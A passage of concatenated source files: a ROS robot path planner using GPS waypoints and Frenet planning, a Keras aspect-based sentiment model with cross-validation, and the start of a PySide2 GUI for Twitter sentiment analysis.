        ry.append(py)
        ryaw.append(csp.calc_yaw(s_i))
        rk.append(csp.calc_curvature(s_i))
    return rx, ry, ryaw, rk, csp
#######################################################################################
def load_global_path():
    """Load recorded GPS waypoints, thin them out and shift to a local origin.

    Sets module globals zero_cord_x / zero_cord_y to the first kept
    waypoint and returns the translated x/y numpy arrays.  Also shows a
    blocking plot of the raw points.
    """
    global zero_cord_x,zero_cord_y
    bet = 0.1    # minimum spacing between kept waypoints [m]
    blank = []   # buffer for the (disabled) duplicate filter
    white = []   # buffer: raw y coordinates
    yellow = []  # buffer: raw x coordinates
    GPS_x = []   # thinned waypoint x
    GPS_y = []   # thinned waypoint y
    # read the recorded waypoints
    nums, ber = np.loadtxt("/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt", dtype=str, delimiter=',', unpack=True)
    for i in range(len(nums)):
        if not nums[i] in blank:  # drop duplicated points (blank never filled)
            #blank.append(nums[i])
            yellow.append(float(nums[i]))
            white.append(float(ber[i]))
    bx = yellow[0]  # start point
    by = white[0]
    for i in range(len(yellow)):
        dx = yellow[i] - bx
        dy = white[i] - by
        dis = math.sqrt(dx ** 2 + dy ** 2)
        if dis > bet:  # keep only points farther apart than bet
            GPS_x.append(yellow[i])
            GPS_y.append(white[i])
            bx = yellow[i]
            by = white[i]
    GPS_x = np.array(GPS_x)
    GPS_y = np.array(GPS_y)
    #print("cx:",cx)
    #print("cy:",cy)
    # translate everything so the first waypoint becomes the local origin
    zero_cord_x = GPS_x[0]
    zero_cord_y = GPS_y[0]
    GPS_x = GPS_x - zero_cord_x
    GPS_y = GPS_y - zero_cord_y
    plt.plot(GPS_x,GPS_y, "-r", label="GPS point ")
    plt.plot()
    plt.show()
    return GPS_x, GPS_y
class Info(object):
    """ROS node state: subscribes to GNSS, motor-feedback and obstacle
    topics, caches the latest values, and publishes the planned local path
    and target velocity."""
    def __init__(self):
        # sentinel -1 means "no message received yet"
        self.CurrGPS_lat = float(-1)
        self.CurrGPS_lon = float(-1)
        self.CurrentVelocity = float(-1)
        self.Target_Velocity = float(-1)
        self.ImuYaw = float(-1)
        self.Target_Theta = float(-1)
        #self.CommandMessage = Car_Input()
        self.gob = np.array([])
        self.ob = np.array([])
        self.gobx = np.array([])
        self.goby = np.array([])
        # Subscribers
        rospy.Subscriber("coordinate", Point, self.FeedbackCallbackObs)
        sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.FeedbackCallbackGPSIMU,queue_size = 10)  # GNSS data
        rospy.Subscriber("Motor_Feedback_mssage", Motor_Feedback,self.RVcallback,queue_size = 10)
    def FeedbackCallbackGPSIMU(self, msg):
        """Cache the latest GNSS fix; convert course angle to a math yaw [rad]."""
        self.CurrGPS_lat = msg.latitude
        self.CurrGPS_lon = msg.longitude
        self.ImuYaw = (90-msg.course_angle)*np.pi/180
        #print(self.CurrGPS_lat,self.CurrGPS_lon,self.ImuYaw)
    def FeedbackCallbackObs(self, msg):
        """Append a detected obstacle and rebuild the Nx2 obstacle array."""
        global Gob_x
        global Gob_y
        self.gobx = msg.x
        self.goby = msg.y
        #print("msg.x","msg.y", msg.x, msg.y)
        Gob_x.append(self.gobx)
        Gob_y.append(self.goby)
        #print("Gob_x","Gob_y", Gob_x, Gob_y)
        #np.append(self.gobx,5)
        #np.append(self.goby,5)
        self.gob = np.column_stack((Gob_x, Gob_y))
        #print(self.gobx,self.goby)
        #print(self.gob)
    def RVcallback(self,msg):
        """Cache the measured vehicle speed."""
        self.CurrentVelocity = msg.Base_Vehspd
        #print("*"*50)
        #print("rv:",rv)
        #rospy.loginfo('I heard: %s', data.data)
    def init(self):
        """Return a snapshot of the latest cached sensor state."""
        return self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx, self.goby, self.gob, self.CurrentVelocity
    def talker(self,Target_Velocity, path_record):
        """Publish the target velocity and the planned local path."""
        self.rate = rospy.Rate(100) # 10hz
        self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10)
        # publisher for the planned trajectory
        self.path_pub = rospy.Publisher('trajectory', localPath, queue_size = 50)
        self.pub_Velocity.publish(Target_Velocity)
        # publish the path
        self.path_pub.publish(path_record)
        #self.rate.sleep()
    # def talker(self,Target_Velocity,Target_Theta):
    #     self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10)
    #     self.pub_Steering = rospy.Publisher('Car_Steering', Float32, queue_size = 10)
    #     self.rate = rospy.Rate(100) # 10hz
    #     self.pub_Velocity.publish(Target_Velocity)
    #     self.pub_Steering.publish(Target_Theta)
    #     self.rate.sleep()
#######################################################################################
def get_transalation(curr_gps_lat,curr_gps_lon):
    """Translate raw GPS coordinates into the local frame anchored at the
    first recorded waypoint (module globals zero_cord_x / zero_cord_y)."""
    curr_posx = float(curr_gps_lat) - zero_cord_x
    curr_posy = float(curr_gps_lon) - zero_cord_y
    return curr_posx, curr_posy
def get_transformation(pt,curr_yaw,T):
    """Rotate row-vector pt by curr_yaw (radians) and translate by T."""
    cos_a = np.cos(curr_yaw)
    sin_a = np.sin(curr_yaw)
    rotation = np.array(((cos_a, -sin_a), (sin_a, cos_a)))
    return pt.dot(rotation) + T
def get_arc_length(tx,ty,st):
    """Sum the segment lengths of the reference path up to index st-1."""
    total = 0
    for i in range(1, st):
        total += np.hypot(tx[i-1] - tx[i], ty[i-1] - ty[i])
    return total
def get_lateral_dist(tx,ty,curr_posx,curr_posy):
    """Find the nearest reference-path point and the signed lateral offset.

    Returns (index of nearest point, signed lateral distance, possibly
    snapped x, possibly snapped y).
    NOTE(review): the search skips the final path point (len(tx)-1), and
    st-1 wraps to the last element when st == 0 -- confirm both are intended.
    """
    dist=[]
    for x in range(0,len(tx)-1):
        dist.append(np.hypot((float(curr_posx)-tx[x]),(float(curr_posy)-ty[x])))
    lat_dist=min(dist)
    st=dist.index(min(dist))
    # heading of the path segment vs. heading of the vector to the vehicle,
    # used to decide which side of the path the vehicle is on
    theta1=math.atan2((ty[st]-ty[st-1]),(tx[st]-tx[st-1]))
    theta2=math.atan2((curr_posy-ty[st-1]),(curr_posx-tx[st-1]))
    if lat_dist<THRESH_DIST:
        # close enough: snap the position onto the reference point
        lat_dist=0
        curr_posx=tx[st]
        curr_posy=ty[st]
    if theta2<theta1:
        # vehicle is on the negative side of the path
        lat_dist=-lat_dist
    # print(lat_dist)
    return st, lat_dist, curr_posx, curr_posy
def proportional_control(target, current):
    """P-controller: acceleration proportional (gain 1.0) to the speed error."""
    return 1.0 * (target - current)
def main():
    """Planner main loop.

    Loads the recorded global path, fits the reference spline, then on every
    ROS cycle: reads the latest GNSS/obstacle state, plans a local Frenet
    path around the obstacles, animates it, and publishes the path and the
    target velocity.  Stops when the goal is reached or ROS shuts down.
    """
    ptx = []
    pty = []
    ptx, pty = load_global_path()
    tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)
    #print(csp)
    road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(ptx, pty)
    # current speed and acceleration state
    c_speed = 5.0/3.6
    c_acc = 1.0
    c_d_dd = 0
    c_d_d = 0
    area = 25.0 # animation area length [m]
    start = time.time()
    rospy.init_node('AvoidObstacles_PlannerOut', anonymous = False)
    my_node = Info()
    while not rospy.is_shutdown():
        CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity = my_node.init()
        #print("gob",gob)
        ob = []
        # only plan once a GNSS fix and heading have been received
        if (CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1):
            curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
            T = [curr_posx, curr_posy]
            curr_yaw = ImuYaw #+ math.pi / 2
            if (len(gob) == 0):
                # no obstacle seen yet: place a dummy one far away
                ob = [[-20, -20]]
            else:
                ob = gob
            ob_len = len(ob)-1
            # transform obstacles into the local planning frame
            # NOTE(review): the last obstacle row is never transformed
            # (the loop stops at len(ob)-1) -- confirm whether intended.
            for x in xrange(0, ob_len):
                ob = np.array(ob)
                #ob[x, :] = .2 * ob[x, :]
                ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)
            #############################################################
            # c_d_dd = c_acc*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))+curr_yaw)
            #spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
            #curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
            try:
                curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
                spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
                s0 = get_arc_length(tx, ty, spt)
                path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)
                # roll the planner state forward to the next path sample
                c_speed = path.s_d[1]
                #c_d_d = c_speed*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))-curr_yaw)
                c_d_d = path.d_d[1]
                c_d_dd = path.d_dd[1]
                if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:
                    print("Goal")
                    c_speed = 0.0
                    break
                if show_animation:
                    plt.cla()
                    plt.plot(tx, ty, "-.k")
                    plt.plot(road_left_x, road_left_y, "-k")
                    plt.plot(road_right_x, road_right_y, "-k")
                    plt.plot(ob[:, 0], ob[:, 1], "ob")
                    plt.plot(path.x[1:], path.y[1:], "-or")
                    plt.plot(path.x[1], path.y[1], "vc")
                    plt.xlim(path.x[1] - area, path.x[1] + area)
                    plt.ylim(path.y[1] - area, path.y[1] + area)
                    plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw), math.sin(curr_yaw),fc="r", ec="k", head_width=0.5, head_length=1.0)
                    plt.title("v[km/h]:" + str(c_speed)[0:4])
                    plt.xlabel(u'x/m', fontsize=14)  # x axis label and font size
                    plt.ylabel(u'y/m', fontsize=14)  # y axis label and font size
                    plt.pause(0.0001)
                #################### planning succeeded ###################
                PathFail_flag = 0
            except:
                ############### planning failed ################
                PathFail_flag = 1
                print("Don't find optimal path")
            ################ clear the obstacle buffers ################
            global Gob_x
            global Gob_y
            Gob_x*=0
            Gob_y*=0
            ###############################################################################
            try:
                '''
                acc = proportional_control(6, CurrentVelocity)
                temp1=path.yaw[1] `
                temp2=curr_yaw
                if temp1<0:
                temp1=6.28+temp1
                if temp2<0:
                temp2=6.28+temp2
                val = temp1-temp2
                if val > 3.14:
                val = val - 6.28
                if val < -3.14:
                val = val + 6.28
                val = math.degrees(val)
                if val > 50:
                val = 50
                if val < -50:
                val = -50
                my_node.talker(acc,val)
                '''
                path_record = localPath()
                # fill the path message
                for i in range(len(path.x[1:])):
                    #print("path_x",path.x[i])
                    path_record.path_x.append(path.x[i])
                    path_record.path_y.append(path.y[i])
                # bound the number of stored path points
                if len(path_record.path_x) > 10000:
                    path_record.path_x.pop(0)
                    path_record.path_y.pop(0)
                # publish the path
                my_node.talker(c_speed, path_record)
            except:
                print("local path send fail")
                pass
            #my_node.talker(c_speed, path.x[1:], path.y[1:])
            #except:
            #    pass
    print("Finish")
    end = time.time()
    #print("total time: ", end - start)
    if show_animation:
        plt.grid(True)
        plt.show()
if __name__ == "__main__":
    main()
|
8,198 | 0b125e7e9e763d4fd71e381ca823f9e9aa8ea606 | from scipy.stats import itemfreq
from sklearn.model_selection import StratifiedKFold
from keras_utils.keras_utils import *
from keras.utils.np_utils import to_categorical
from keras.layers import Input, Embedding, Dense, GlobalAveragePooling1D, Flatten
from keras.layers import add, multiply, LSTM, Bidirectional, BatchNormalization, LeakyReLU, concatenate, Lambda
from keras.models import Model
from keras import backend as K
def f1(y_true, y_pred):
    """Batch-wise F1 score computed from batch-wise precision and recall."""
    def _recall(yt, yp):
        # recall = TP / (TP + FN), computed over the whole batch
        tp = K.sum(K.round(K.clip(yt * yp, 0, 1)))
        possible = K.sum(K.round(K.clip(yt, 0, 1)))
        return tp / (possible + K.epsilon())
    def _precision(yt, yp):
        # precision = TP / (TP + FP), computed over the whole batch
        tp = K.sum(K.round(K.clip(yt * yp, 0, 1)))
        predicted = K.sum(K.round(K.clip(yp, 0, 1)))
        return tp / (predicted + K.epsilon())
    p = _precision(y_true, y_pred)
    r = _recall(y_true, y_pred)
    return 2 * ((p * r) / (p + r + K.epsilon()))
def precision(y_true, y_pred):
    """Batch-wise precision: true positives over predicted positives."""
    tp = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    predicted = K.sum(K.round(K.clip(y_pred, 0, 1)))
    return tp / (predicted + K.epsilon())
def recall(y_true, y_pred):
    """Batch-wise recall: true positives over possible positives."""
    tp = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    possible = K.sum(K.round(K.clip(y_true, 0, 1)))
    return tp / (possible + K.epsilon())
class MaskedGlobalAveragePooling1D(GlobalAveragePooling1D):
    """GlobalAveragePooling1D that accepts (and propagates) Keras masks."""
    def __init__(self, **kwargs):
        super(MaskedGlobalAveragePooling1D, self).__init__(**kwargs)
        # opt in to masking; the pooling computation itself is inherited
        self.supports_masking = True
class MaskableFlatten(Flatten):
    """Flatten layer that tolerates an incoming Keras mask."""
    def __init__(self, **kwargs):
        super(MaskableFlatten, self).__init__(**kwargs)
        # opt in to masking; flattening itself is inherited unchanged
        self.supports_masking = True
# train data path
DATA1_TRAIN_PATH = '../data/data_1_train.csv'
DATA2_TRAIN_PATH = '../data/data_2_train.csv'
# GLoVe pre-trained word vectors path
EMBEDDING_DIR = '../embeddings/'
EMBEDDING_TYPE = 'glove.6B.300d.txt' # glove.6B.300d.txt
EMBEDDING_PICKLE_DIR = 'embeddings_index.p'
EMBEDDING_ERROR_DIR = 'embeddings_error.p'
ASPECT_EMBEDDING_DIR = 'aspect_embeddings.p'
# tokenizer path
TOKENIZER_DIR = 'embeddings/tokenizer.p'
MAX_SEQ_LENGTH = 60
MAX_NB_WORDS = 95000
EMBEDDING_DIM = 300
# aspect dictionary
aspect_dict = {}
"""
What this model does:
2 ip - 1 op model : 2 ip = sentence and aspect sentence
Shared embedding layer = reduce # of params and chance to overfit.
sentence embedding = sentence passed through embedding layer (keep for later)
aspect embedding = aspect sentence passed through embedding layer
On this aspect embedding, use attention mechanism to jointly learn what is the "best" augmentation to the sentence embedding
- Dense layer that maps 1 : 1 between the aspect embedding and the aspect attention
- Softmax forces it to choose the "parts" of the sentence that help the most in training
- No bias needed for attention
- Next is to actually augment the aspect embeddings with this learned attention
- The element-wise multiplication forces many embeddings to become close to zero
- Only a few will remain "strong" after this multiplication. These are the "important" words in the aspect sentence
Finally, augment the original sentence embeddings with the attended aspect embeddings
- This will "add" some strength to the embeddings of the "important" words
- Remaining words will not be impacted at all (since they are added with near zero values)
Benefits of this model
- Choose if you want to send a unique aspect sentence for the corresponding sentence
- By this I mean, you have a choice
- 1) Use the original sentence as aspect input.
In doing so, it is basically like saying learn on your own what the aspect word is
It may not give much benefit, as the attended vector has the chance of being all equal (no attention)
- 2) Use a true aspect encoding as the aspect input.
Since you are sharing the embedding now, you cannot use random / own assigned aspects anymore.
The aspect ids that you pass will now be from the original embedding matrix using the word_index
dict that Keras gives you.
In this case, an aspect sentence would be of the form :
[0 0 ... 32506 66049 5968 0 0 ...]
Here 32506 = "Apple", 66049 = "Macbook" 5968 = "Pro" (say)
"""
NUM_CLASSES = 3  # 0 = neg, 1 = neutral, 2 = pos
MAX_SENTENCE_LENGTH = 60
MAX_NUM_WORDS = 20000  # this will be number of unique "words" (n-grams etc) there are
MAX_NUM_ASPECT_WORDS = 300  # this will be the number of unique aspect "words" (uni-grams only)
# NOTE(review): redefines EMBEDDING_DIM from the constants block above
# (same value, 300) — harmless but redundant.
EMBEDDING_DIM = 300
# No pre-trained weights are passed to Embedding layers while this is None.
EMBEDDING_WEIGHTS = None
MASK_ZEROS = True  # this can be true ONLY for RNN models. If even 1 CNN is there, it will crash
#
# embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
# weights=EMBEDDING_WEIGHTS, trainable=False)
#
# sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
# aspect_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
#
# sentence_embedding = embedding(sentence_ip) # Note: these are same embedding layer
# aspect_embedding = embedding(aspect_ip) # Note: these are same embedding layer
#
# # Create the attention vector for the aspect embeddings
# aspect_attention = Dense(EMBEDDING_DIM, activation='softmax', use_bias=False,
# name='aspect_attention')(aspect_embedding)
#
# # dampen the aspect embeddings according to the attention with an element-wise multiplication
# aspect_embedding = multiply([aspect_embedding, aspect_attention])
#
# # augment the sample embedding with information from the attended aspect embedding
# sentence_embedding = add([sentence_embedding, aspect_embedding])
#
# # now you can continue with whatever layer other than CNNs
#
# x = LSTM(100)(sentence_embedding)
# x = Dense(NUM_CLASSES, activation='softmax')(x)
#
# model = Model(inputs=[sentence_ip, aspect_ip], outputs=x)
#
# model.summary()
#
#
# from keras.utils.vis_utils import plot_model
# plot_model(model, to_file='shared_embedding.png', show_shapes=False, show_layer_names=True)
#
"""
What this model does:
2 ip - 1 op model : 2 ip = sentence and aspect sentence
Disjoint embedding layer = more # of params and chance to overfit.
sentence embedding = sentence passed through embedding layer (keep for later ; not learned)
aspect embedding = aspect sentence passed through embedding layer (learned)
Benefits of this model
- Use a true aspect encoding as the aspect input.
Since you are learning the embedding now, you can use own assigned aspects.
In this case, an aspect sentence would be of the form :
[0 0 ... 2 2 2 0 0 ...]
Here 2 = "Apple", 2 = "Macbook" 2 = "Pro" (say)
Therefore, the id is given by you, and is shared over all of the aspect words for a given aspect term.
"""
def output_shape(input_shape):
    """Return *input_shape* with its last dimension halved.

    Intended as the ``output_shape`` argument of a ``Lambda`` layer that
    slices away half of the final axis (see the commented-out attention
    code in ``model_2``).

    :param input_shape: sequence of dimensions; leading entries may be
        ``None`` (batch axis) but the last entry must be an int.
    :return: tuple with the last dimension halved.
    """
    shape = list(input_shape)
    # Integer division: Keras expects int dimensions, and the original
    # ``/=`` produced a float under Python 3.
    shape[-1] //= 2
    return tuple(shape)
def model_2():
    """Train the 2-input (sentence + aspect) attention LSTM classifier.

    Uses a frozen sentence Embedding plus a *learned* aspect Embedding;
    a sigmoid attention over the aspect embedding dampens unimportant
    aspect words before concatenation with the sentence embedding (see
    the module-level design notes above).

    NOTE(review): ``load_and_clean``, ``load_embedding_matrix``, ``np``
    and ``itemfreq`` come from the ``keras_utils`` star import — confirm
    their contracts there.
    """
    K.clear_session()
    tech_reviews, food_reviews = load_and_clean()
    embedding_matrix, aspect_sequences, padded_sequences, labels = load_embedding_matrix(food_reviews)
    # labels = [x+1 for x in labels]
    print(itemfreq(labels))  # class-frequency table for a quick balance check
    # Shuffle sentences, labels and aspect sequences with one shared
    # permutation so the three arrays stay aligned.
    indices = np.arange(0, padded_sequences.shape[0], step=1, dtype=int)
    np.random.shuffle(indices)
    padded_sequences = padded_sequences[indices]
    labels = to_categorical(labels, num_classes=NUM_CLASSES)
    labels = labels[indices]
    aspect_sequences = aspect_sequences[indices]
    # Frozen embedding for the sentence input.
    # NOTE(review): EMBEDDING_WEIGHTS is None at module level, so no
    # pre-trained weights are actually loaded here — confirm intended.
    sentence_embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
                                   weights=EMBEDDING_WEIGHTS, trainable=False)
    # aspect_embedding = Embedding(MAX_NUM_ASPECT_WORDS, EMBEDDING_DIM, mask_zero=MASK_ZEROS, trainable=True)
    # this needs to be True
    aspect_embedding = Embedding(len(aspect_dict) + 1, EMBEDDING_DIM, mask_zero=MASK_ZEROS, trainable=True)
    sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
    aspect_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
    sentence_embedding = sentence_embedding(sentence_ip)  # Note: these are two different embeddings
    aspect_embedding = aspect_embedding(aspect_ip)  # Note: these are two different embeddings
    # Create the attention vector for the aspect embeddings
    aspect_attention = Dense(EMBEDDING_DIM, activation='sigmoid', use_bias=False,
                             name='aspect_attention')(aspect_embedding)
    # dampen the aspect embeddings according to the attention with an element-wise multiplication
    aspect_embedding = multiply([aspect_embedding, aspect_attention])
    # augment the sample embedding with information from the attended aspect embedding
    sentence_embedding = concatenate([sentence_embedding, aspect_embedding])
    # now you can continue with whatever layer other than CNNs
    # x = MaskedGlobalAveragePooling1D()(sentence_embedding)
    # x = MaskableFlatten()(sentence_embedding)
    x = LSTM(256)(sentence_embedding)
    # y = Lambda(lambda z: z[:, :, :NUM_CELLS//2], output_shape=output_shape)(x)
    # x = Dense(NUM_CELLS//2, activation='softmax', use_bias=False)(x)
    # x = multiply([x, y])
    # x = MaskedGlobalAveragePooling1D()(x)
    # x = Dense(256, activation='linear', kernel_initializer='he_normal')(x)
    # x = BatchNormalization()(x)
    # x = LeakyReLU()(x)
    x = Dense(3, activation='softmax')(x)
    model = Model(inputs=[sentence_ip, aspect_ip], outputs=x)
    model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])
    print(model.summary())
    model.fit([padded_sequences, aspect_sequences], labels, epochs=10, verbose=1, validation_split=0.2)
    # from keras.utils.vis_utils import plot_model
    # plot_model(model, to_file='learned_embedding.png', show_shapes=False, show_layer_names=True)
def model_2_CV():
    """3-fold stratified CV of the 2-input aspect-attention model.

    Same architecture as ``model_2`` but evaluated on the tech reviews
    with ``StratifiedKFold``; prints the mean f-beta score over folds.

    NOTE(review): ``fbeta_score`` (used as a compile metric below) is not
    defined in this file — presumably it comes from the ``keras_utils``
    star import; verify it exists there.
    """
    K.clear_session()
    tech_reviews, food_reviews = load_and_clean()
    embedding_matrix, aspect_sequences, padded_sequences, labels = load_embedding_matrix(tech_reviews)
    # Shift labels up by one — presumably from {-1, 0, 1} to {0, 1, 2};
    # TODO confirm against load_embedding_matrix's label convention.
    labels = np.array([x + 1 for x in labels])
    print(itemfreq(labels))
    # Random shuffling of padded, aspect sequences and labels
    # indices = np.arange(0, padded_sequences.shape[0], step=1, dtype=int)
    # np.random.shuffle(indices)
    # padded_sequences = padded_sequences[indices]
    # labels = to_categorical(labels, num_classes=NUM_CLASSES)
    # labels = labels[indices]
    # aspect_sequences = aspect_sequences[indices]
    print(labels.shape)
    N_FOLDS = 3
    fbeta_scores = []
    skf = StratifiedKFold(N_FOLDS, shuffle=True, random_state=1000)
    for j, (train_idx, test_idx) in enumerate(skf.split(padded_sequences, labels)):
        print('Fold %d' % (j + 1))
        sentence_train, aspect_train, y_train = padded_sequences[train_idx], aspect_sequences[train_idx], \
                                                labels[train_idx]
        sentence_test, aspect_test, y_test = padded_sequences[test_idx], aspect_sequences[test_idx], labels[test_idx]
        y_train = to_categorical(y_train, 3)
        y_test = to_categorical(y_test, 3)
        # Layers are re-created per fold so each fold trains from scratch.
        sentence_embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
                                       weights=EMBEDDING_WEIGHTS, trainable=False)
        aspect_embedding = Embedding(len(aspect_dict) + 1, EMBEDDING_DIM, mask_zero=MASK_ZEROS, trainable=True)
        sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
        aspect_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
        sentence_embedding = sentence_embedding(sentence_ip)  # Note: these are two different embeddings
        aspect_embedding = aspect_embedding(aspect_ip)  # Note: these are two different embeddings
        # Create the attention vector for the aspect embeddings
        aspect_attention = Dense(EMBEDDING_DIM, activation='sigmoid', use_bias=False,
                                 name='aspect_attention')(aspect_embedding)
        # dampen the aspect embeddings according to the attention with an element-wise multiplication
        aspect_embedding = multiply([aspect_embedding, aspect_attention])
        # augment the sample embedding with information from the attended aspect embedding
        sentence_embedding = concatenate([sentence_embedding, aspect_embedding])
        x = LSTM(256)(sentence_embedding)
        x = Dense(3, activation='softmax')(x)
        model = Model(inputs=[sentence_ip, aspect_ip], outputs=x)
        model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc', fbeta_score])
        print(model.summary())
        model.fit([sentence_train, aspect_train], y_train, epochs=5, verbose=1,
                  validation_data=([sentence_test, aspect_test], y_test))
        scores = model.evaluate([sentence_test, aspect_test], y_test)
        fbeta_scores.append(scores[-1])
    print("Average fbeta score : ", sum(fbeta_scores) / len(fbeta_scores))
def model_3():
    """10-fold CV baseline: plain LSTM over a frozen sentence embedding.

    Trains a single-input LSTM classifier on the food reviews and writes
    each fold's accuracy / F1 / precision / recall histories to
    ``history.txt``.

    NOTE(review): ``load_and_clean``, ``load_embedding_matrix``, ``np``
    and ``itemfreq`` come from the ``keras_utils`` star import — confirm
    their contracts there.
    """
    K.clear_session()
    tech_reviews, food_reviews = load_and_clean()
    embedding_matrix, aspect_sequences, padded_sequences, labels = load_embedding_matrix(food_reviews)
    # Shift labels up by one — presumably from {-1, 0, 1} to {0, 1, 2};
    # TODO confirm against load_embedding_matrix's label convention.
    labels = np.array([x + 1 for x in labels])
    print(itemfreq(labels))
    N_FOLDS = 10
    skf = StratifiedKFold(N_FOLDS, shuffle=True, random_state=1000)
    # Context manager guarantees the history log is flushed and closed
    # even if a fold raises; the original leaked the file handle.
    with open('history.txt', 'w+') as f:
        for j, (train_idx, test_idx) in enumerate(skf.split(padded_sequences, labels)):
            print('Fold %d' % (j + 1))
            sentence_train, y_train = padded_sequences[train_idx], labels[train_idx]
            sentence_test, y_test = padded_sequences[test_idx], labels[test_idx]
            y_train = to_categorical(y_train, 3)
            y_test = to_categorical(y_test, 3)
            # Embedding layer re-created per fold so each fold starts fresh.
            sentence_embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
                                           weights=EMBEDDING_WEIGHTS, trainable=False)
            sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
            sentence_embedding = sentence_embedding(sentence_ip)
            x = LSTM(256, dropout=0.2, recurrent_dropout=0.2)(sentence_embedding)
            x = Dense(3, activation='softmax')(x)
            model = Model(inputs=sentence_ip, outputs=x)
            model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc', f1, precision, recall])
            print(model.summary())
            history = model.fit(sentence_train, y_train, epochs=10, verbose=1, validation_data=(sentence_test, y_test))
            # Append this fold's metric histories to the log.
            f.write('\nFold %d\n' % (j + 1))
            f.write(str(history.history['acc']))
            f.write(str(history.history['val_acc']))
            f.write(str(history.history['f1']))
            f.write(str(history.history['precision']))
            f.write(str(history.history['recall']))
# Script entry point: run the plain-LSTM cross-validation baseline.
if __name__ == '__main__':
    model_3()
#---------------------------------------------
# File name: phase2app.py
# Description: Launches GUI for Twitter User Timeline Sentiment Analysis program
# Author: Gilbert Yap (gilberty@bu.edu)
# Date: October 03, 2020
#---------------------------------------------
from PySide2.QtWidgets import QApplication, QDialog, QVBoxLayout, QMessageBox
from PySide2.QtCore import Qt, QFile, QRegExp
from PySide2.QtGui import QRegExpValidator
from phase2GUI import Ui_Dialog
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import configparser, csv, datetime, sys
sys.path.insert(1, '..\\SharedFiles\\')
import matplotlib.pyplot as plt
import helper, phase2Functions
SETTINGS_FILE = '..\\SharedFiles\\settings.ini'
class Ui_Window(QDialog):
    """Main window for the Twitter timeline sentiment-analysis GUI.

    Wraps the generated ``Ui_Dialog`` layout, embeds a matplotlib canvas
    with a navigation toolbar, and wires the buttons to the backend in
    ``phase2Functions``. Exits the process if the APIs cannot be
    initialized from the settings file.
    """

    def __init__(self):
        super(Ui_Window, self).__init__()
        self.ui = Ui_Dialog()
        self.ui.setupUi(self)

        # Restrict the username field to word characters. Raw string
        # avoids the invalid "\w" escape warning from the original.
        regex = QRegExp(r"\w+")
        validator = QRegExpValidator(regex)
        self.ui.usernameLineEdit.setValidator(validator)

        # Default the end date to today. Take one timestamp so the three
        # fields cannot straddle a midnight rollover between calls.
        today = datetime.datetime.now()
        self.ui.endMonthSpinBox.setValue(today.month)
        self.ui.endDaySpinBox.setValue(today.day)
        self.ui.endYearSpinBox.setValue(today.year)

        # Place a plot (with toolbar) inside of plotDisplayGroupBox.
        self.figure = plt.figure()
        self.canvas = FigureCanvas(self.figure)
        self.toolbar = NavigationToolbar(self.canvas, self)
        layout = QVBoxLayout()
        layout.addWidget(self.toolbar)
        layout.addWidget(self.canvas)
        self.ui.plotDisplayGroupBox.setLayout(layout)

        # Set up signals.
        self.ui.processDatesPushButton.clicked.connect(self.plotSentiment)
        self.ui.exportPushButton.clicked.connect(self.exportValues)

        # Init the Twitter / Google APIs from the shared settings file.
        settings = configparser.ConfigParser()
        settings.read(SETTINGS_FILE)
        helper.print_with_stars('Initializing APIs')
        (twitterApi, googleClient, errors) = phase2Functions.init_apis(settings['KEYS']['api_key'], settings['KEYS']['api_secret_key'])
        if(len(errors) > 0):
            self.printMessages(errors)
            sys.exit(1)
        else:
            self.twitterApi = twitterApi
            self.googleClient = googleClient

        self.show()

    def plotSentiment(self):
        """Fetch tweets for the chosen window and plot their sentiment.

        Reads the username/date widgets, asks the backend for per-tweet
        sentiment score and magnitude, draws both series on the embedded
        canvas and enables CSV export. Shows a dialog on backend errors.
        """
        QApplication.setOverrideCursor(Qt.WaitCursor)
        # Get the sentiment data
        startDate = self.get_start_date()
        endDate = self.get_end_date()
        if (startDate is None) or (endDate is None):
            # Restore the cursor before bailing out, otherwise the app
            # is stuck on the wait cursor after an invalid date.
            QApplication.restoreOverrideCursor()
            return
